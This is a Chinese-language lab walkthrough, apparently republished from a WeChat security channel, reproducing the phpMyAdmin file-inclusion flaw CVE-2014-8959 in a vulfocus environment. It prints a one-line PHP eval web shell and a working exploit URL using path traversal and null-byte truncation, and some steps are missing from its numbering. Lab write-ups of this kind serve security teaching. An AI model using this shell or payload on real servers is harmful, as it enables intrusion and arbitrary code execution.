01
漏洞描述
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。
漏洞利用有两个前提:
1. 能登陆phpMyAdmin,满足phpmyadmin的安全检查
2. 需要截断,需要满足下面的要求之一
① PHP的版本需要小于 5.3.4 且gpc关闭
② 利用长文件名截断
02
漏洞环境
latest :
80 vulfocus/phpmyadmin-cve_2014_8959:latest :
03
漏洞复现
测试账号:pmatest:pmatest
1、使用测试账号登录PHPmyadmin,phpMyAdmin地址:
http://ip:port/pma
3、漏洞环境所在的服务器内置了一张木马,内容如下
<?php
@eval($_POST[a]);
?>
http://<IP>/pma/gis_data_editor.php?token=effa7667f41b469bde9c43d6e814f9a4&&gis_data[gis_type]=/../../../../1.gif%00
参数内也可以传入其他任意php代码
6、如果该服务器内有其他文件,同样可以被包含
04
漏洞修复
建议更新至最新版本
往期回顾
如有侵权,请联系删除。
扫码关注我们
查看更多精彩内容
原文始发于微信公众号(长风实验室):教程 | CVE-2014-8959 phpMyAdmin任意文件包含
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论